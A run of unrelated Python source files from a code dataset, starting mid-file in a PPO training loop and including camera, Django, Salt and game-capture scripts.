shuffle=not pi.recurrent)\n optim_batchsize = optim_batchsize or ob.shape[0]\n\n if hasattr(pi, \"ob_rms\"): pi.ob_rms.update(ob) # update running mean/std for policy\n\n assign_old_eq_new() # set old parameter values to new parameter values\n logger.log(\"Optimizing...\")\n logger.log(fmt_row(13, loss_names))\n # Here we do a bunch of optimization epochs over the data\n for _ in range(optim_epochs):\n losses = [] # list of tuples, each of which gives the loss for a minibatch\n for batch in d.iterate_once(optim_batchsize):\n *newlosses, g = lossandgrad(batch[\"ob\"], batch[\"ac\"], batch[\"atarg\"], batch[\"vtarg\"], cur_lrmult)\n if desired_kl != None and schedule == 'adaptive':\n if newlosses[-2] > desired_kl * 2.0:\n optim_stepsize = max(1e-8, optim_stepsize / 1.5)\n print('kl divergence was too large = ', newlosses[-2])\n print('New optim_stepsize = ', optim_stepsize)\n elif newlosses[-2] < desired_kl / 2.0:\n optim_stepsize = min(1e0, optim_stepsize * 1.5)\n print('kl divergence was too small = ', newlosses[-2])\n print('New optim_stepsize = ', optim_stepsize)\n adam.update(g, optim_stepsize * cur_lrmult)\n losses.append(newlosses)\n #print(str(losses))\n logger.log(fmt_row(13, np.mean(losses, axis=0)))\n\n logger.log(\"Evaluating losses...\")\n losses = []\n for batch in d.iterate_once(optim_batchsize):\n newlosses = compute_losses(batch[\"ob\"], batch[\"ac\"], batch[\"atarg\"], batch[\"vtarg\"], cur_lrmult)\n losses.append(newlosses)\n meanlosses,_,_ = mpi_moments(losses, axis=0)\n logger.log(fmt_row(13, meanlosses))\n\n for (lossval, name) in zipsame(meanlosses, loss_names):\n logger.record_tabular(\"loss_\"+name, lossval)\n logger.record_tabular(\"ev_tdlam_before\", explained_variance(vpredbefore, tdlamret))\n lrlocal = (seg[\"ep_lens\"], seg[\"ep_rets\"]) # local values\n listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples\n lens, rews = map(flatten_lists, zip(*listoflrpairs))\n lenbuffer.extend(lens)\n rewbuffer.extend(rews)\n\n logger.record_tabular(\"EpLenMean\", np.mean(lenbuffer))\n rewmean = np.mean(rewbuffer)\n logger.record_tabular(\"EpRewMean\", rewmean)\n logger.record_tabular(\"EpThisIter\", len(lens))\n episodes_so_far += len(lens)\n timesteps_so_far += sum(lens)\n iters_so_far += 1\n\n logger.record_tabular(\"EpisodesSoFar\", episodes_so_far)\n logger.record_tabular(\"TimestepsSoFar\", timesteps_so_far)\n logger.record_tabular(\"TimeElapsed\", time.time() - tstart)\n\n if dump_training:\n with open(logdir + \"\\\\\" + 'ob_list_' + str(rank) + '.pkl', 'wb') as f:\n pickle.dump(ob_list, f)\n\n if MPI.COMM_WORLD.Get_rank()==0:\n logF.write(str(rewmean) + \"\\n\")\n logStats.write(logger.get_str() + \"\\n\")\n logF.flush()\n logStats.flush()\n\n logger.dump_tabular()\n\n try:\n os.remove(logdir + \"/checkpoint\")\n except OSError:\n pass\n try:\n saver.save(tf.get_default_session(), os.path.join(logdir, agentName), global_step=iters_so_far)\n except:\n pass\n\ndef flatten_lists(listoflists):\n return [el for list_ in listoflists for el in list_]\n","sub_path":"baselines/ppo1/pposgd_parallel.py","file_name":"pposgd_parallel.py","file_ext":"py","file_size_in_byte":25406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"229395361","text":"\r\n# -*- coding: utf-8 -*-\r\nfrom pybloom import BloomFilter\r\nimport pybloomfilter\r\n\r\nbf = BloomFilter(capacity=1000, error_rate=0.001)\r\nbf = bf.fromfile(open('18', 'r'))\r\nprint(bf)\r\nprint(bf.__contains__(u'文档'))\r\n#\r\n# from pybloomfilter import BloomFilter\r\n#\r\nbf = pybloomfilter.BloomFilter(10000000, 0.01, 'filter.bloom')\r\n# print(1)\r\n# bf.add(\"ass\")\r\n# print(bf)\r\n","sub_path":"demo/test/testBF.py","file_name":"testBF.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"460494180","text":"# External Dependencies\nfrom multiprocessing import Queue\nfrom threading import Timer\nimport io\nimport time\nimport traceback\nimport operator\n\n\nclass CameraProcess():\n\n def scan_qr_code(in_queue, out_queue):\n from pyzbar import pyzbar\n from .pivideostream import PiVideoStream\n try:\n print(\"Instantiate PiVideoStream start\")\n start_time = int(time.time() * 1000)\n video_stream = PiVideoStream(resolution=(512, 384),framerate=12)\n end_time = int(time.time() * 1000)\n print(f\"Instantiate PiVideoStream finish: {end_time - start_time}ms\")\n\n video_stream.start()\n\n msg = [\"\"]\n\n while True:\n # Loop the reader until we get a result or receive \"stop\"\n frame = video_stream.read()\n\n if frame is None:\n # Camera isn't returning data yet\n time.sleep(0.1)\n continue\n\n barcodes = pyzbar.decode(frame)\n for barcode in barcodes:\n data = barcode.data.decode(\"utf-8\")\n out_queue.put([data])\n break\n if len(barcodes) == 0:\n out_queue.put([\"nodata\"])\n\n try:\n # Get any updates from the message queue, but don't wait\n msg = in_queue.get(block=False)\n except:\n pass\n\n if msg[0] == \"stop\":\n break\n finally:\n try:\n video_stream.stop()\n except:\n pass\n\n\n\n def capture_single_frame(in_queue, out_queue):\n from PIL import Image\n import picamera\n\n print(\"Instantiate PiCamera start\")\n start_time = int(time.time() * 1000)\n camera = picamera.PiCamera(resolution=(720, 480), framerate=8)\n end_time = int(time.time() * 1000)\n print(f\"Instantiate PiCamera finish: {end_time - start_time}ms\")\n\n try:\n print(\"camera ready\")\n out_queue.put([\"ready\"])\n\n # Wait for the \"click\" command\n while True:\n try:\n msg = in_queue.get(block=False)\n break\n except:\n time.sleep(0.1)\n\n if msg[0] == \"stop\":\n print(\"Received 'stop'\")\n return\n\n elif msg[0] == \"click\":\n print(\"Received 'click'\")\n\n # Wait for the automatic gain control to settle\n time.sleep(0.25)\n # Now fix the values\n camera.shutter_speed = camera.exposure_speed\n camera.exposure_mode = 'off'\n g = camera.awb_gains\n camera.awb_mode = 'off'\n camera.awb_gains = g\n\n stream = io.BytesIO()\n camera.capture(stream, format='jpeg')\n\n # \"Rewind\" the stream to the beginning so we can read its content\n stream.seek(0)\n\n out_queue.put([Image.open(stream)])\n\n except Exception as e:\n traceback.print_exc()\n\n finally:\n camera.close()\n print(\"Cleaned up capture_single_frame\")\n\n\n @classmethod\n def start(cls, out_queue, in_queue):\n print(\"CameraProcess start\")\n start_time = int(time.time() * 1000)\n from .pivideostream import PiVideoStream\n end_time = int(time.time() * 1000)\n print(f\"CameraProcess finish import: {end_time - start_time}ms\")\n\n is_running = True\n\n while is_running:\n is_camera_on = False\n\n msg = []\n msg = in_queue.get()\n\n if msg[0] == \"start\":\n CameraProcess.scan_qr_code(in_queue, out_queue)\n\n elif msg[0] == \"single_frame\":\n CameraProcess.capture_single_frame(in_queue, out_queue)\n\n elif msg[0] == \"stop\":\n print(\"stop camera!!\")\n\n time.sleep(0.25) # No need to poll all that frequently\n\n\n\nclass CameraPoll(object):\n\n def __init__(self, interval, function, *args, **kwargs):\n self._timer = None\n self.interval = interval\n self.function = function\n self.args = args\n self.kwargs = kwargs\n self.is_running = False\n self.start()\n\n def _run(self):\n self.is_running = False\n self.start()\n self.function(*self.args, **self.kwargs)\n\n def start(self):\n if not self.is_running:\n self._timer = Timer(self.interval, self._run)\n self._timer.start()\n self.is_running = True\n\n def stop(self):\n self._timer.cancel()\n self.is_running = False","sub_path":"src/seedsigner/helpers/camera_process.py","file_name":"camera_process.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"238295732","text":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"run sdk infer\"\"\"\nimport argparse\nimport os\nfrom sr_infer_wrapper import SRInferWrapper\n\ndef parser_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_dir\", type=str, default=\"../data/DIV2K/input/\",\n help=\"path of input images directory\")\n parser.add_argument(\"--pipeline_path\", type=str, default=\"../data/config/edsr.pipeline\",\n help=\"path of pipeline file\")\n parser.add_argument(\"--output_dir\", type=str, default=\"../data/sdk_out/\",\n help=\"path of output images directory\")\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = parser_args()\n sr_infer = SRInferWrapper()\n sr_infer.load_pipeline(args.pipeline_path)\n path_list = os.listdir(args.input_dir)\n path_list.sort()\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n for img_path in path_list:\n print(img_path)\n res = sr_infer.do_infer(os.path.join(args.input_dir, img_path))\n res.save(os.path.join(args.output_dir, img_path.replace('x2', '_infer')))\n","sub_path":"official/cv/EDSR/infer/sdk/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"280954030","text":"\"\"\"Tests for the flake8.exceptions module.\"\"\"\nimport pickle\n\nfrom flake8 import exceptions\n\n\nclass _ExceptionTest:\n def test_pickleable(self):\n \"\"\"Test that the exception is round-trip pickleable.\"\"\"\n for proto in range(pickle.HIGHEST_PROTOCOL + 1):\n new_err = pickle.loads(pickle.dumps(self.err, protocol=proto))\n assert str(self.err) == str(new_err)\n orig_e = self.err.original_exception\n new_e = new_err.original_exception\n assert (type(orig_e), orig_e.args) == (type(new_e), new_e.args)\n\n\nclass TestFailedToLoadPlugin(_ExceptionTest):\n \"\"\"Tests for the FailedToLoadPlugin exception.\"\"\"\n\n err = exceptions.FailedToLoadPlugin(\n plugin_name='plugin_name',\n exception=ValueError('boom!'),\n )\n\n\nclass TestInvalidSyntax(_ExceptionTest):\n \"\"\"Tests for the InvalidSyntax exception.\"\"\"\n\n err = exceptions.InvalidSyntax(exception=ValueError('Unexpected token: $'))\n\n\nclass TestPluginRequestedUnknownParameters(_ExceptionTest):\n \"\"\"Tests for the PluginRequestedUnknownParameters exception.\"\"\"\n\n err = exceptions.PluginRequestedUnknownParameters(\n plugin={'plugin_name': 'plugin_name'},\n exception=ValueError('boom!'),\n )\n\n\nclass TestPluginExecutionFailed(_ExceptionTest):\n \"\"\"Tests for the PluginExecutionFailed exception.\"\"\"\n\n err = exceptions.PluginExecutionFailed(\n plugin={'plugin_name': 'plugin_name'},\n exception=ValueError('boom!'),\n )\n","sub_path":"tests/unit/test_exceptions.py","file_name":"test_exceptions.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"349455961","text":"from Charecters.hero import Hero\nfrom Charecters.enemy import Enemy\nfrom .weapon import Weapon\nfrom Dungeon.dungeon import *\n\nclass Fight:\n def __init__(self, hero, enemy,dungeon):\n self.hero = hero\n self.enemy = enemy\n self.dungeon = dungeon\n \n\n @staticmethod\n def greater(a, b):\n if a > b:\n return a\n else:\n return b\n\n def attack_by_hero(self):\n check_weapon = self.dungeon.hero_can_attack_by_weapon(self.enemy)\n if self.hero.can_attack_by_spell() is True and self.hero.can_attack_by_weapon() is True and check_weapon is True:\n #chosen_attack_damage = self.greater(self.hero.attack(by=\"weapon\"), self.hero.attack(by=\"spell\"))\n chosen_attack_damage = self.greater(self.hero.weapon.get_damage(), self.hero.spell.get_damage())\n elif self.hero.can_attack_by_weapon() is True and check_weapon is True:\n chosen_attack_damage = self.hero.weapon.get_damage()\n elif self.hero.can_attack_by_spell() is True:\n chosen_attack_damage = self.hero.spell.get_damage()\n else:\n chosen_attack_damage = 0\n if chosen_attack_damage == 0:\n print(\"Hero can't attack, he has no spell and weapon or is out of mana.\")\n elif chosen_attack_damage == self.hero.spell.get_damage() and self.hero.can_attack_by_spell():\n self.hero.use_mana(self.hero.spell.get_mana_cost())\n self.enemy.take_damage(chosen_attack_damage)\n print(\"Hero casts a \" + self.hero.spell.get_name() + \" ,hits enemy for \" + str(chosen_attack_damage) + \" dmg.\")\n print(\"Enemy health is \" + str(self.enemy.get_health()))\n #Added this so we don't attack with a weapon from miles away\n elif not self.dungeon.hero_attack('weapon'):\n print('Hero cannot cast a spell and is too far to attack by weapon!')\n return\n else:\n self.enemy.take_damage(chosen_attack_damage)\n print(\"Hero hits enemy with a \" + self.hero.weapon.get_name() + \" for \" + str(chosen_attack_damage) + \" dmg.\")\n print(\"Enemy health is \" + str(self.enemy.get_health()))\n\n def attack_by_enemy(self):\n self.hero.take_damage(self.enemy.get_damage())\n print(\"Enemy hits hero for \" + str(self.enemy.get_damage()) + \" dmg.\")\n print(\"Hero health is \" + str(self.hero.get_health()))\n\n\n\n\n","sub_path":"Items/fight.py","file_name":"fight.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"201612642","text":"#!/usr/bin/env python\n\nfrom primes import iprimes2\n\nd = 10001\n\n#x is the limit\nx = 100000\nwhile True:\n for val in iprimes2(x):\n pass\n gen = iprimes2(x)\n li = list(iprimes2(x))\n length = len(li)\n last = li[-1]\n print('[{}: len: {} last: {}]'.format(x, length, last))\n\n if length == d:\n #print('{} {} highest: {}'.format(x, length, list(gen)[-1]))\n break\n elif length < d:\n if length < (d / float(2)):\n x *= 2\n else:\n x += 2\n elif length > d:\n x -= 2\n","sub_path":"python/problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"465608350","text":"import random, math\r\n\r\ndef tower_sample(Pi):\r\n L=[0]\r\n K=len(Pi)\r\n for l in range(1, K+1): L+=[L[l-1]+Pi[l-1], ]\r\n Upsilon=random.uniform(0, L[-1])\r\n\r\n for k in range(1, len(L)+1):\r\n if (Upsilon>L[k-1] and Upsilon1:\r\n Upsilon1=1-Upsilon1\r\n Upsilon2=1-Upsilon2\r\n x=X[0][0]+Upsilon1*(X[1][0]-X[0][0])+Upsilon2*(X[2][0]-X[0][0])\r\n y=X[0][1]+Upsilon1*(X[1][1]-X[0][1])+Upsilon2*(X[2][1]-X[0][1])\r\n return [x, y]\r\n\r\ndef direct_polygon(X):\r\n \"\"\"X is a list of vertices for a polygon with n>3 vertices\"\"\"\r\n n=len(X)\r\n s1, s2=0., 0.\r\n for i in range(n):\r\n s1+=X[i][0]\r\n s2+=X[i][1]\r\n Xc=[s1/n, s2/n]\r\n X+=[X[0], ]\r\n A=[0]*n\r\n for k in range(n):\r\n A[k]=(Xc[0]*X[k][1]+X[k][0]*X[k+1][1]+X[k+1][0]*Xc[1]-X[k][0]*Xc[1]-X[k+1][0]*X[k][1]-Xc[0]*X[k+1][1])/2.\r\n k=tower_sample(A)\r\n x=direct_triangle([Xc, X[k], X[k+1]])\r\n return x\r\n\r\ndef fast_deposition(R, t, L, r):\r\n \"\"\" box of area=L*L, radius of each identical circle=r\"\"\"\r\n A_tot=L**2\r\n A1=[]\r\n s=0.\r\n K=len(R)\r\n for X in range(K):\r\n n=len(X)\r\n s1, s2=0., 0.\r\n for i in range(n):\r\n s1+=X[i][0]\r\n s2+=X[i][1]\r\n Xc=[s1/n, s2/n]\r\n X+=[X[0], ]\r\n A=[0]*n\r\n for k in range(n):\r\n A[k]=(Xc[0]*X[k][1]+X[k][0]*X[k+1][1]+X[k+1][0]*Xc[1]-X[k][0]*Xc[1]-X[k+1][0]*X[k][1]-Xc[0]*X[k+1][1])/2.\r\n A1+=[sum(A), ]\r\n s+=sum(A)\r\n L=1-s/A_tot\r\n del_t=1+int(math.log(random.random())/math.log(L))\r\n k=tower_sample(A1)\r\n \r\n flag=0\r\n while True:\r\n p=[direct_polygon(R[k])]\r\n for l in range(len(R[k])):\r\n if min([math.sqrt((p[0]-P[0])**2+(p[1]-P[1])**2) for P in pos])>=2*radius:\r\n pos+=[p, ]\r\n flag=1\r\n break\r\n\r\n t+=1\r\n if flag==1:break\r\n return t, R\r\n","sub_path":"Chapter 7/fast-deposition.py","file_name":"fast-deposition.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"299181425","text":"#!/usr/bin/env python\n\nfrom datetime import datetime\nimport os\nimport random\nimport string\nimport sys\nimport time\n\n\npillar_tmpl = \"\"\"\\\ncontroller: lanternctrl1-2\nauth_token: %s\ninstall-from: git\ninstance_id: %s\nproxy_protocol: tcp\n\"\"\"\n\nAUTH_TOKEN_ALPHABET = string.letters + string.digits\nAUTH_TOKEN_LENGTH = 64\n\n\ndef random_auth_token():\n return ''.join(random.choice(AUTH_TOKEN_ALPHABET)\n for _ in xrange(AUTH_TOKEN_LENGTH))\n\ndef minion_id(prefix, n):\n return '%s-jp-%s-%s' % (\n prefix,\n datetime.now().date().isoformat().replace('-', ''),\n str(n).zfill(3))\n\ndef accept_minions(prefix, start, number):\n for i in xrange(start, start+number):\n id_ = minion_id(prefix, i)\n file(\"/srv/pillar/%s.sls\" % id_, 'w').write(\n pillar_tmpl % (random_auth_token(), id_))\n os.system(\"salt-key -ya %s\" % id_)\n\n\nif __name__ == '__main__':\n accept_minions(sys.argv[1],\n int(sys.argv[2]),\n int(sys.argv[3]))\n","sub_path":"salt/cloudmaster/accept_minions.py","file_name":"accept_minions.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"251579135","text":"import os, zipfile\n\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.messages import error, info\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .forms import UserForm, RegistrationForm, ModuleForm\nfrom .models import User, InviteCode, Modules, UserProfile, ModulesStatus, MessageBoard, Teams, MessageViews\nfrom .helpers import generator\n\n\ndef index(request):\n if request.user.is_authenticated():\n return redirect(\"/home/\")\n\n else:\n form = UserForm()\n return render(request,\"login.html\",{'LoginForm':form})\n\n\ndef register(request, invite=\"0000\"):\n if request.method == \"POST\":\n current_invite = InviteCode.objects.get(invite_code=request.POST['invite'])\n\n if current_invite.active:\n new_user = User.objects.create_user(request.POST['username'],current_invite.email,request.POST['password'])\n new_profile = UserProfile(user=new_user,\n invite_code=request.POST['invite'],\n team=current_invite.leader)\n\n team = Teams(team=current_invite.leader,\n member=new_user)\n\n if current_invite.staff:\n new_user.is_staff = True\n\n new_profile.save()\n new_user.save()\n team.save()\n\n current_invite.active = False\n current_invite.save()\n\n info(request,\"You have been registered, please login\")\n return redirect(\"/login/\")\n else:\n return redirect(\"/\")\n else:\n if request.user.is_authenticated():\n return redirect(\"/home/\")\n else:\n return render(request, \"register.html\",{'form': RegistrationForm(),'invite':invite})\n\n\ndef userlogin(request):\n if request.method == \"POST\":\n user = authenticate(username=request.POST['username'],\n password=request.POST['password'])\n if user is not None:\n if user.is_active:\n login(request, user)\n info(request, \"Welcome back\")\n return redirect(\"/home/\")\n\n else:\n info(request, \"User is not active\")\n return redirect(\"/login/\")\n\n else:\n error(request, \"There was an error with your username/password\")\n return redirect(\"/login/\")\n\n else:\n form = UserForm()\n return render(request, \"login.html\", {'LoginForm': form})\n\n\n@csrf_exempt\n@login_required\ndef content_mgmt(request):\n\n if request.method == \"POST\":\n if request.POST[\"action\"] == \"delete\":\n Modules.objects.filter(name=request.POST[\"item\"]).delete()\n info(request, \"Module Deleted\")\n return redirect(\"/home/\")\n\n elif request.POST[\"action\"] == \"publish\":\n mod = Modules.objects.get(name=request.POST[\"item\"])\n\n if mod.published:\n mod.published = False\n info(request, \"Module Unpublished\")\n\n else:\n mod.published = True\n info(request, \"Module Published\")\n\n mod.save()\n\n return redirect(\"/home/\")\n\n elif request.POST[\"action\"] == \"upload\":\n\n if request.FILES[\"module\"]:\n uploadedfile = request.FILES[\"module\"]\n module_dir = \"modules/\"\n ext = uploadedfile.name.split(\".\")\n storage = generator.id_generator(size=16)\n upload_dir = os.path.join(module_dir,storage,uploadedfile.name)\n fs = FileSystemStorage()\n fs.save(upload_dir, uploadedfile)\n\n if ext[1:len(ext)][0] == \"zip\" and os.path.isfile(upload_dir):\n zip_ref = zipfile.ZipFile(upload_dir,\"r\")\n zip_ref.extractall(os.path.join(settings.MEDIA_ROOT,module_dir,storage,'store'))\n zip_ref.close()\n\n if not request.POST['name']:\n module_name = ext[0]\n\n else:\n module_name = request.POST['name']\n\n Modules(name=module_name,\n description=request.POST['description'],\n owner=request.user.username,\n storage=storage,\n module=uploadedfile.name)\n\n info(request, \"Module Uploaded\")\n return redirect(\"/home/\")\n\n else:\n return redirect(\"/home/\")\n\n\n@login_required\ndef home(request):\n\n modules = Modules.objects.all()\n personal_stats = ModulesStatus.objects.filter(user=request.user.id)\n return render(request, \"home.html\", {\"modules\": modules,\n \"pstats\":personal_stats,})\n\n\n@login_required\ndef manage(request):\n\n if request.method == \"POST\":\n\n if request.POST.get('staff'):\n staff = True\n\n else:\n staff = False\n\n\n # TODO: move invite code stuff from models\n invite = InviteCode().create_code(leader=request.user,\n email=request.POST['email'],\n staff=staff)\n\n # send invite email.\n message = \"\"\"\n # email/invite not working yet\n Good Day,\n You've been invited to use the Daimlier Learning Platform\n\n http://localhost:8000/register/%s\n\n Cheers,\n The DLP Team\n \"\"\" % invite\n\n info(request, message)\n return redirect(\"/manage\")\n\n\n total_invites = InviteCode.objects.all()\n pending_invites = total_invites.filter(active=True)\n team_all_invites = total_invites.filter(leader=request.user)\n team_pending_invites = total_invites.filter(active=True, leader=request.user)\n\n # superusers can see all teams.\n current_team = UserProfile.objects.filter(team=request.user)\n\n module_all = Modules.objects.filter(published=True)\n module_status = ModulesStatus.objects.all()\n\n dasstats = []\n for a in module_all:\n if a.published:\n for b in module_status:\n if a.id == b.module_id:\n dasstats.append({\"user_id\":b.user_id,\"status\":b.status,\"module\":a,\"dtg\":b.dtg})\n\n\n return render(request, \"manage.html\", {\"total_invites\":total_invites,\n \"pending_invites\":pending_invites,\n \"team_pending_invites\":team_pending_invites,\n \"team_all_invites\":team_all_invites,\n \"current_team\":current_team,\n \"module_status\":module_status,\n \"dasstats\":dasstats,\n \"modules\":module_all})\n\n\n\n\n@login_required\ndef module(request, storage=None):\n\n try:\n current_module = Modules.objects.get(storage=storage)\n if not ModulesStatus.objects.filter(user=request.user,module=current_module):\n ModulesStatus(user=request.user,\n module=current_module,\n status=\"started\").save()\n\n return render(request, \"module.html\", {\"module\": current_module})\n\n except:\n info(request, \"There was an error with your request\")\n return redirect(\"/home/\")\n\n\n\n@login_required\ndef profile(request):\n\n if request.method == \"POST\":\n current_user = User.objects.get(username=request.user.username)\n current_user.email = request.POST['email']\n current_user.first_name = request.POST['firstname']\n current_user.last_name = request.POST['lastname']\n current_user.save()\n info(request, \"Profile Updated\")\n return redirect('/profile')\n\n else:\n return render(request, \"profile.html\")\n\n\n@login_required\ndef userlogout(request):\n\n logout(request)\n return redirect(\"/home/\")\n\n\n@login_required\ndef message(request, message_id=None):\n\n myprofile = UserProfile.objects.get(user=request.user)\n board = MessageBoard.objects.filter(team=myprofile.team, parent=0).order_by(\"-id\")\n board_views = MessageViews.objects.filter(user=request.user)\n\n if request.method == \"POST\":\n\n try:\n\n MessageBoard(body=request.POST[\"body\"],\n author=request.user,\n parent=request.POST[\"parent\"],\n team=myprofile.team).save()\n\n info(request,\"beta message\")\n return redirect(\"/message/\" + request.POST[\"parent\"])\n except:\n MessageBoard(title=request.POST[\"title\"],\n body=request.POST[\"body\"],\n author=request.user,\n parent=0,\n team=myprofile.team).save()\n info(request, \"Message Posted\")\n return redirect(\"/message/\")\n\n\n if message_id:\n try:\n payload = MessageBoard.objects.get(id=message_id)\n payload_reply = MessageBoard.objects.filter(parent=message_id)\n if not MessageViews.objects.filter(message=payload, user=request.user, data=\"view\"):\n MessageViews(message=payload, user=request.user, data=\"view\").save()\n except:\n info(request, \"There was a problem with your request\")\n return redirect(\"/message/\")\n\n else:\n payload=None\n payload_reply=None\n\n return render(request, \"message.html\", {\"board\":board,\n \"views\":board_views,\n \"payload\":payload,\n \"payload_reply\":payload_reply})\n\n\n","sub_path":"playground/dlp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"330007511","text":"import glob\nimport os\nimport sys\nimport time\n\nimport numpy as np\nimport tensorboardX as tb\nimport torch\nimport torch.optim as optim\nimport os\nimport utils.timer\nfrom datasets.dataTools.test_data_loader import DataLoader\nfrom options.config import cfg\nfrom options.options import opt\nfrom PIL import Image\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\n\nclass SolverWrapper(object):\n \"\"\"\n A wrapper class for the training process\n \"\"\"\n\n def __init__(self, network, vidb, bsdb, model_path):\n self.net = network\n self.vidb = vidb\n self.bsdb = bsdb\n self.bsdb_len = len(self.bsdb)\n self.model_path = model_path\n\n def construct_graph(self):\n torch.manual_seed(cfg.RNG_SEED)\n self.net.init_modules(self.vidb.num_classes)\n\n def initialize(self):\n \"\"\"\n 初始化参数\n \"\"\"\n self.net.load_state_dict(torch.load(str(self.model_path)))\n\n def test_model(self):\n self.data_loader = DataLoader(self.bsdb, self.vidb.num_classes, cfg.PIXEL_MEAN, num_kernel=cfg.KERNEL_NUM,\n image_size=cfg.IMAGE_SIZE, frame_jump=opt.frame_jump)\n # Construct the computation graph\n self.construct_graph()\n\n self.initialize()\n\n self.net.eval()\n self.net.to(self.net.device)\n acc = 0\n for i in range(0, self.bsdb_len):\n frames, classes = self.data_loader.set_index(i)\n labels = torch.Tensor().long().to(self.net._device)\n print(i)\n for j in range(0, int(frames//(1.5)), 2):\n test_batch, test_label, test_class = self.data_loader.forward(j)\n label = self.net.test(test_batch, test_label, test_class)\n labels = torch.cat([labels, label], dim=0)\n label, is_true = get_true_label(labels, classes)\n if is_true:\n acc += 1\n print(\"Computed label : {}, Real Label : {}\".format(\n self.vidb._ind_to_class[label], self.vidb._ind_to_class[classes]))\n acc_ = acc / self.bsdb_len\n print('Test accuracy: %.6f' % (acc_))\n\n\ndef get_true_label(labels, real_label):\n \"\"\" \n labels 每一帧 判断出来的label Tensor\n real_label 真实标签\n \"\"\"\n labels_np = labels.cpu().numpy()\n label = np.argmax(np.bincount(labels_np))\n is_true = True if label == real_label else False\n return label, is_true\n\n\ndef get_bsdb_from_vidb(vidb):\n return vidb.bsdb\n\n\ndef test_net(network, vidb, bsdb, model_path):\n \"\"\"Train network\"\"\"\n sw = SolverWrapper(network, vidb, bsdb, model_path)\n # 准备训练\n sw.test_model()\n","sub_path":"model/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"430389942","text":"import capture\nimport images\nimport pickle\nimport dino.score as score\nimport numpy as np\nimport reduction\n\n\nclass RawGameCapturer(capture.Capture):\n def __init__(self, reduction_factor_x=1, reduction_factor_y=None):\n \"\"\"Capture the whole game environment.\"\"\"\n self.reduction_factor_x = reduction_factor_x\n self.reduction_factor_y = reduction_factor_y or reduction_factor_x\n self.capturer = capture.ScreenRegion(664, 173, 593, 102)\n\n def capture(self):\n \"\"\"Capture the game environment.\"\"\"\n return images.greyscale(self.capturer.capture())[\n :: self.reduction_factor_x, :: self.reduction_factor_y\n ]\n\n\ndef collect_raw_footage(backlog_size=10):\n \"\"\"Collect raw images of the game being played.\"\"\"\n backlog = capture.CaptureBacklog(\n capture.CaptureGroup(score=score.ScoreCapturer(2), game=RawGameCapturer(4)), 20\n )\n key_capturer = capture.KeyState(\"up\")\n frames = []\n\n try:\n while True:\n await_game_start(key_capturer)\n await_game_finish(frames, backlog)\n except KeyboardInterrupt:\n save_raw_footage([frame[\"game\"] for frame in frames])\n return None\n\n\ndef get_raw_footage_location():\n \"\"\"Return the location of the raw footage save file.\"\"\"\n return \"data/raw_frames.obj\"\n\n\ndef save_raw_footage(frames):\n \"\"\"Saves raw footage as a tensor under data/raw_frames.obj.\"\"\"\n file_handler = open(get_raw_footage_location(), \"wb\")\n numpy_frames = np.array(frames)\n pickle.dump(np.reshape(numpy_frames, [numpy_frames.shape[0], -1]), file_handler)\n file_handler.close()\n\n\ndef load_raw_frames():\n \"\"\"Load the numpy array containing the raw game frames.\"\"\"\n file_handler = open(get_raw_footage_location(), \"rb\")\n object = pickle.load(file_handler)\n file_handler.close()\n return object\n\n\ndef await_game_start(up_capturer):\n \"\"\"Wait until the game starts, and then return.\"\"\"\n while True:\n if up_capturer.capture():\n print(\"Game started.\")\n return None\n\n\ndef await_game_finish(frames, backlog):\n \"\"\"Wait for the game to finish, recording frames while doing so.\"\"\"\n while True:\n frames.append(backlog.update())\n if backlog.full:\n mean = np.mean(np.square(backlog.at(0)[\"game\"] - backlog.at(-1)[\"game\"]))\n if mean == 0.0:\n print(\"Game finished.\")\n return None\n\n\ndef create_autoencoder(name, latent_dimension, layers):\n \"\"\"Create an autoencoder for compressing game frames.\"\"\"\n autoencoder = reduction.make_mirrored_autoencoder(\n 26 * 149, latent_dimension, layers\n )\n reduction.save_autoencoder(autoencoder, name)\n\n\ndef load_autoencoder(name):\n \"\"\"Load an autoencoder and compile it for training.\"\"\"\n 